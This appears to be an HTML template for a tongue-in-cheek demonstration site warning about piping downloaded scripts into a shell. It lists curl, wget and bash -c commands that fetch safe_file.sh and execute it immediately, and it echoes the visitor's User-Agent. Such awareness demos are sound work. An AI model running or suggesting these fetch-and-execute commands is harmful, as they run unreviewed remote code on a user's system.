<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>unsafe-curl.chriscarini.com</title>
</head>
<body>
<h1>Hello, world!</h1>
<p>
    Nothing to see here. 😉<br/>
    <br/>
    This domain hosts a <b><i>totally safe-to-execute</i></b> file, named <code><a href="safe_file.sh">safe_file.sh</a></code>.<br/>
    <br/>
    ... certainly don't run any of the below commands in your terminal.<br/>
    <br/>
</p>
<pre>&nbsp;&nbsp;&nbsp;&nbsp;💻 $ curl -s https://unsafe-curl.chriscarini.com/safe_file.sh | sh</pre>
<pre>&nbsp;&nbsp;&nbsp;&nbsp;💻 $ wget -q -O- https://unsafe-curl.chriscarini.com/safe_file.sh | sh</pre>

<!-- Homebrew / brew.sh -->
<pre>&nbsp;&nbsp;&nbsp;&nbsp;💻 $ /bin/bash -c "$(curl -fsSL http://localhost:5000/safe_file.sh)"</pre>
<br/>
<hr/>
<p>
    User-Agent: {{ user_agent }}
</p>
</body>
</html>